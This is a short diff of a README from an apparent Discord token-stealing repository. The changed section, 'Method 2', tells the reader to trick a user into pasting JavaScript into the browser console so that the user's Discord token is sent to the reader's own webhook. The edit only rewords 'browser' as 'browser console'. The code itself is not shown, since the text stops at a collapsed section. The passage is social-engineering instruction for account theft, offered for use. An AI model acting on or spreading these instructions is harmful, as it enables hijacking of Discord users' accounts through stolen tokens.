ZakuroSoda/Discord-Matters/README.md

 ### Method 2: Get user to run code and token will be sent to you (JavaScript)

-Get user to copy and paste this code into browser and token will be automatically sent back to you via discord webhook.
+Get user to copy and paste this code into browser console and token will be automatically sent back to you via discord webhook.
 Replace ```YOUR DISCORD WEBHOOK HERE``` with your discord webhook URL.

 <details>